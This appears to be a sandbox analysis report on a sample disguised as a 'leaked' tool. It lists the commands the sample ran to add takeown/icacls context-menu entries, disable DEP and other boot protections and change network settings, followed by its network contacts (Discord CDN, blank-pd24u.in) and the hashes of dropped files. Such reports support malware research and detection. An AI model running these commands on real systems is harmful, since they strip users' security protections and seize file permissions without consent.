Reg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\netsh.exe
netsh int tcp set global rss=enable
C:\Windows\system32\netsh.exe
netsh int tcp set global autotuninglevel=normal
C:\Windows\system32\netsh.exe
netsh int tcp set global ecncapability=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global timestamps=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set global initialrto=2000
C:\Windows\system32\netsh.exe
netsh int tcp set global maxsynretransmissions=2
C:\Windows\system32\netsh.exe
netsh int tcp set global rsc=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set global nonsackrttresiliency=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set global fastopen=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global fastopenfallback=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global hystart=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set global pacingprofile=off
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformclock
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick yes
C:\Windows\system32\bcdedit.exe
bcdedit /timeout 0
C:\Windows\system32\bcdedit.exe
bcdedit /set nx optout
C:\Windows\system32\bcdedit.exe
bcdedit /set bootux disabled
C:\Windows\system32\bcdedit.exe
bcdedit /set bootmenupolicy standard
C:\Windows\system32\bcdedit.exe
bcdedit /set hypervisorlaunchtype off
C:\Windows\system32\bcdedit.exe
bcdedit /set tpmbootentropy ForceDisable
C:\Windows\system32\bcdedit.exe
bcdedit /set quietboot yes
C:\Windows\system32\bcdedit.exe
bcdedit /set {globalsettings} custom:16000067 true
C:\Windows\system32\bcdedit.exe
bcdedit /set {globalsettings} custom:16000069 true
C:\Windows\system32\bcdedit.exe
bcdedit /set {globalsettings} custom:16000068 true
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
C:\Windows\system32\bcdedit.exe
bcdedit /set tscsyncpolicy Enhanced
C:\Windows\system32\netsh.exe
netsh interface teredo set state disabled
C:\Windows\system32\netsh.exe
netsh interface 6to4 set state disabled
C:\Windows\system32\netsh.exe
netsh winsock reset
C:\Windows\system32\netsh.exe
netsh int isatap set state disable
C:\Windows\system32\netsh.exe
netsh int ip set global taskoffload=disabled
C:\Windows\system32\netsh.exe
netsh int ip set global neighborcachelimit=4096
C:\Windows\system32\netsh.exe
netsh int tcp set global timestamps=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set heuristics disabled
C:\Windows\system32\netsh.exe
netsh int tcp set global autotuninglevel=disable
C:\Windows\system32\netsh.exe
netsh int tcp set global chimney=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set global ecncapability=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set global rss=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global rsc=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set global dca=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global netdma=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global nonsackrttresiliency=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set security mpp=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set security profiles=disabled
C:\Windows\system32\netsh.exe
netsh int ip set global icmpredirects=disabled
C:\Windows\system32\netsh.exe
netsh int tcp set security mpp=disabled profiles=disabled
C:\Windows\system32\netsh.exe
netsh int ip set global multicastforwarding=disabled
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell Disable-NetAdapterLso -Name "*"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=760 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterPowerManagement -Name $adapter.Name -ErrorAction SilentlyContinue}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterLso -Name $adapter.Name -ErrorAction SilentlyContinue}"
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnableICMPRedirect" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnablePMTUDiscovery" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "Tcp1323Opts" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpMaxDupAcks" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpTimedWaitDelay" /t REG_DWORD /d "32" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "GlobalMaxTcpWindowSize" /t REG_DWORD /d "8760" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpWindowSize" /t REG_DWORD /d "8760" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxConnectionsPerServer" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxUserPort" /t REG_DWORD /d "65534" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "SackOpts" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "DefaultTTL" /t REG_DWORD /d "64" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_SZ /d "ffffffff" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5084 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| GB | 172.165.61.93:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.61.93:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| GB | 104.91.71.133:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.6.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.71.91.104.in-addr.arpa | udp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| GB | 172.165.69.228:443 | dl-edge.smartscreen.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 133.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 29.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| GB | 92.123.128.149:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 149.128.123.92.in-addr.arpa | udp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 13.87.96.169:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.96.87.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-pd24u.in | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.200.42:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | cd67ca4d88d40fbdc3fe1a395f98a8bc |
| SHA1 | cfc0ab8e240ceeb0b41b66ec87c5aa22bee69a6a |
| SHA256 | 0b2c4c3de72fdbe44f3659da4f6ab476782bf7d256548d6cd0731912285d24d8 |
| SHA512 | cdd8fb31ad56b058f2272bcf14516f5fa9d9ceb3e2223a54e490ed5854af21080ad66753b2bcd9600bafe09923b45434bd6a263e662468f7a4136ab1115fd8e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9ae8e22e33a364417baa518871fa12b2 |
| SHA1 | 0c85298bd65104351f836ac6d9a864f9f67f5340 |
| SHA256 | 0528696653e86f522afd4052c9e2199a68ac37d4696f26630d235bbcc3f456c7 |
| SHA512 | 55546aa6b9788c92cab046a4e3310d0ddda898e1caf2f8b463e1e01a9ef312c84e169222a2df5f1670ae6361043428350769dd8a702c214427457fec87fb74fa |
\??\pipe\crashpad_3704_CYQSTATVKZCNFFYD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1698e1120853544014c2c544442c8460 |
| SHA1 | 7b7ba208c30a35877e7f701dfb5f6c0b18051d8a |
| SHA256 | ab8f567d01c89445b79aac419d903341218e00f6d23b7f6dfcedb3f4ae50ce4e |
| SHA512 | 475d1b0908f57ada5d3ed41b70f04e762f913c0985226c870cdca05e5a614eeb61e76d46dc97e806637af4bf9ceff0864e94a5740cfa674af6f91b6f7894a2c8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c1afed0d0e0f93b545789393104793e0 |
| SHA1 | b9ed8d1b04026bfdbd19946161ebb1060c8292cb |
| SHA256 | 78d1a29ec3454828248eb2a01016deba629a87a969fdd68ca87f81651f5c77d2 |
| SHA512 | c7b6e81cbb699da7eda5087eccf948fdbfa024f33e7160f01a1706c5466b232d91c5fd0a769ca41c0619821f475e2554be9f0f28c788d9948e925fb463ee5aef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe
| MD5 | 5c8fc4049f875577ac6722806184391c |
| SHA1 | f23617e724154cb34604149f296b8e7563d8d2c7 |
| SHA256 | a6d6b6adfcb46e203c7ec8684f343d533097291723dd375890351e5d1e39b204 |
| SHA512 | 5087b04a7665819efc8380b96b392f0aa23ac38a11e1e4713a782d178571328f912352e4dd2bf1b5ecb3afe1aa1a971477aeb8c16a01580983bc9eec800b4b9e |
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe
| MD5 | 649b38a3433d7ae4bd11a5de40e71ab6 |
| SHA1 | a4847bb6b9203354c3f39250897b557e55b59df4 |
| SHA256 | b7a04367704dca447f089fb3bca0aa1a36d2d930bfc524d399a57f125e46f8c4 |
| SHA512 | 57a5c66197e95e97ad47acfa4688c30e0d5f75af12d3552054d71d336c9b4788e9cc86351cc2317c5760de0d9a8cf9f9e75c1cbf0492ca018b471220f4d55ad5 |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\ucrtbase.dll
| MD5 | 8e7680a8d07c3c4159241d31caaf369c |
| SHA1 | 62fe2d4ae788ee3d19e041d81696555a6262f575 |
| SHA256 | 36cc22d92a60e57dee394f56a9d1ed1655ee9db89d2244a959005116a4184d80 |
| SHA512 | 9509f5b07588a08a490f4c3cb859bbfe670052c1c83f92b9c3356afa664cb500364e09f9dafac7d387332cc52d9bb7bb84ceb1493f72d4d17ef08b9ee3cb4174 |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\python310.dll
| MD5 | 01988415e8fb076dcb4a0d0639b680d9 |
| SHA1 | 91b40cffcfc892924ed59dc0664c527ff9d3f69c |
| SHA256 | b101db1ddd659b8d8ffd8b26422fde848d5b7846e0c236f051fadb9412de6e24 |
| SHA512 | eab0c3ca4578751a671beb3da650b5e971a79798deb77472e42f43aa2bea7434ad5228a8fddbfff051ce05054dbf3422d418f42c80bc3640e0e4f43a0cf2ebbe |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\python310.dll
| MD5 | 4e02de9a0e676fb8f740fc047a04a5ca |
| SHA1 | f96328455f7966ffd6926dc450882083afdc624d |
| SHA256 | e9aa0dc8f9c8b79013337c9a67c496454337e0ff3557074709fb2806093d2c7d |
| SHA512 | 253ebbb93e59e315e06bde92ca83976b48a99f6a7619020fb453edf72808cf07fcbef3cf1090377011ab84c12c66972a6a27d79f4b2f877cfd2dc41a2f73a1c6 |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\VCRUNTIME140.dll
| MD5 | 6c1f9732533e4623a6cd0af49f7b40fa |
| SHA1 | 7d26b539ef7becf120c4306c9fa21a26e71203e0 |
| SHA256 | 16d99b5afc24638508b51acf60a5b5e1492d1deda620ef7c79baef4791340ab7 |
| SHA512 | 360d3c38f07189711aaa9679db21e56cb729b9f81c642363dde3543570edec4c162e4457f4d6531fe47248f7f5ee71eb116c523c3233b81ee183f65cc986afc9 |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\VCRUNTIME140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
memory/2812-159-0x00007FF9D3730000-0x00007FF9D3B9E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI17362\base_library.zip
| MD5 | b71c1e073b7a1bb2e4f87767eb17bf63 |
| SHA1 | 452cebd6aff011e96f36c600bbc46ef18f2d8996 |
| SHA256 | 927b335f7088b8a9f8509f99e59e5a86435a4a691a85a889a5bc6833a3a3381e |
| SHA512 | 11147deaffe0a1bbe3702da0a771cf32245adbedd10543542f49aae124638b5c9facdacfb216825544e2e985cba43eabe6f52404bd6e792b65719ad30e1d683b |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\_ctypes.pyd
| MD5 | b3a39eab934c679cae09c03e61e44d3f |
| SHA1 | e3d7e9770089de36bc69c8527250dbfac51367b7 |
| SHA256 | 083fd5b8871869fb5571046e1c5336b0ca9b6e8dbc3d00983d81badd28a46ee2 |
| SHA512 | 5704b9618e1a3750145e7e735890b646cf4cd0793a23628d2e70a263cd8bd77b12b55f3b9cb7f0b40da402507db994403e8d9fecb69f01865a3c56c6456c5cb6 |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\libssl-1_1.dll
| MD5 | eac369b3fde5c6e8955bd0b8e31d0830 |
| SHA1 | 4bf77158c18fe3a290e44abd2ac1834675de66b4 |
| SHA256 | 60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c |
| SHA512 | c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778 |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\libcrypto-1_1.dll
| MD5 | daa2eed9dceafaef826557ff8a754204 |
| SHA1 | 27d668af7015843104aa5c20ec6bbd30f673e901 |
| SHA256 | 4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914 |
| SHA512 | 7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea |
memory/2812-209-0x00007FF9E7750000-0x00007FF9E775F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI17362\bound.blank
| MD5 | a4bfe9de2681015f065ae0586655acc3 |
| SHA1 | 5a02ca8b34a13183645a69eee58322a5af3550f2 |
| SHA256 | 36853379ee9f7d3d0f89847cf0af2e8973d32567092ac87f01957de6df283ee5 |
| SHA512 | 7a2a997e0c516d35b003667af799a9c7d2b0bd423767ebcde7bbef0b3b208588142a699f6dc99ba7b26f61d1889bbb1e75591aacf3d63ede6db6426d861fab79 |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\blank.aes
| MD5 | ec181af3bd731f7aca757ce598e00f7d |
| SHA1 | b37d236d9311313415a27c57c30dc2ad302bd9b1 |
| SHA256 | 8c2e6c00370114c9104a9a835a85228786b49ad0e2c02f3bc6e4988482a1e849 |
| SHA512 | cc13ae289ded603a7a260989136fae84382fca811a892e1fab74a5638915b00e69bf05da9135f483e80c9d0816931d63e968c9e3d33ccd1a0bc2daba0b57a1c8 |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | 26f020c0e210bce7c7428ac049a3c5da |
| SHA1 | 7bf44874b3ba7b5ba4b20bb81d3908e4cde2819c |
| SHA256 | dfad88b5d54c597d81250b8569f6d381f7016f935742ac2138ba2a9ae514c601 |
| SHA512 | 7da07143cab0a26b974fa90e3692d073b2e46e39875b2dd360648382d0bfca986338697600c4bc9fe54fc3826daa8fc8f2fec987de75480354c83aba612afa5f |
C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-time-l1-1-0.dll
| MD5 | b64b9e13c90f84d0b522cd0645c2100c |
| SHA1 | 39822cb8f0914a282773e4218877168909fdc18d |
